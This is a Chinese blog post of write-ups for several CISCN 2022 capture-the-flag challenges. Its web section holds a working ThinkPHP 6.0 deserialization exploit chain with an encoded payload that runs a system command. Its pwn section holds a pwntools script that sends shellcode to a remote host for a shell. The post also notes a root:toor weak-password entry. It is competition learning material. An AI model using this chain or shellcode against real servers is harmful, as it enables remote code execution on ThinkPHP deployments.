iami233
iami233
文章123
标签35
分类4
CISCN 2022 部分赛题WP

CISCN 2022 部分赛题WP

感觉今年的题目比去年的简单些,三道密码非预期。好朋友帮忙做了150道选择题,然后出了六道CTF题就下线划水了~

Misc

签到电台

首先根据题干,向公众号发送关键字得到 hint

image-20220529192111341

打开题目环境,发现密码本,然后根据公众号的提示,7*4个数字也就是前28位

image-20220529192406094

image-20220529192356538

点击纯数字模式取前 28

1
1272685121234614783219665440

然后 弼时安全到达了 所对应的7个电码:

1
1732 2514 1344 0356 0451 6671 0055

get请求 启动电报机

1
/send?msg=s

然后 get请求 模十之后的 28 位数字

1
/send?msg=2904836534674960728375375495

WEB

ezpop

tp6.0 的反序列化,直接百度搜一个exp就行了( ThinkPHP6.0反序列化链审计与分析:https://forum.butian.net/share/1168 ),我们只需要找到反序列化点,经过 dirsearch 扫描,发现存在 www.zip 文件,然后在 index.php 控制器里存在反序列化点

image-20220529190643876

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
<?php

namespace think {

use think\route\Url;

abstract class Model
{
private $lazySave;
private $exists;
protected $withEvent;
protected $table;
private $data;
private $force;
public function __construct()
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->table = new Url();
$this->force = true;
$this->data = ["1"];
}
}
}

namespace think\model {

use think\Model;

class Pivot extends Model
{
function __construct()
{
parent::__construct();
}
}
$b = new Pivot();
echo urlencode(serialize($b));
}

namespace think\route {

use think\Middleware;
use think\Validate;

class Url
{
protected $url;
protected $domain;
protected $app;
protected $route;
public function __construct()
{
$this->url = 'a:';
$this->domain = "<?php system('cat /flag.txt');?>";
$this->app = new Middleware();
$this->route = new Validate();
}
}
}

namespace think {

use think\view\driver\Php;

class Validate
{
public function __construct()
{
$this->type['getDomainBind'] = [new Php(), 'display'];
}
}
class Middleware
{
public function __construct()
{
$this->request = "sp4c1ous";
}
}
}

namespace think\view\driver {
class Php
{
public function __construct()
{
}
}
}

payload

1
2
3
// ?s=index/test或者/index.php/index/test

a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D

密码

基于挑战码的双向认证 & 基于挑战码的双向认证2

ssh连上直接 find 搜索flag

1
find / -name 'flag*'

image-20220529141216774

1
cat /root/cube-shell/instance/flag_server/flag*

image-20220529141301156

第一个flag是 基于挑战码的双向认证 第二个是 基于挑战码的双向认证2

基于挑战码的双向认证3

非预期,账号密码:root:toor 弱口令

1
cat /root/cube-shell/instance/flag_server/flag*

image-20220529145150993

PWN

login-nomal

定位到 main > sub_FFD()

image-20220529200604410

很明显是对 sc 的执行。

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
# p = process('./login')
p = remote('123.56.87.204', 36979)
pl = "msg:ro0tt\nopt:1\n"
p.sendlineafter(">>", pl)
key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000"
pl = "msg:" + key + "\nopt:2\n"
p.sendlineafter(">>", pl)
p.interactive()
本文作者:iami233
本文链接:https://5ime.cn/ciscn-2022.html
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可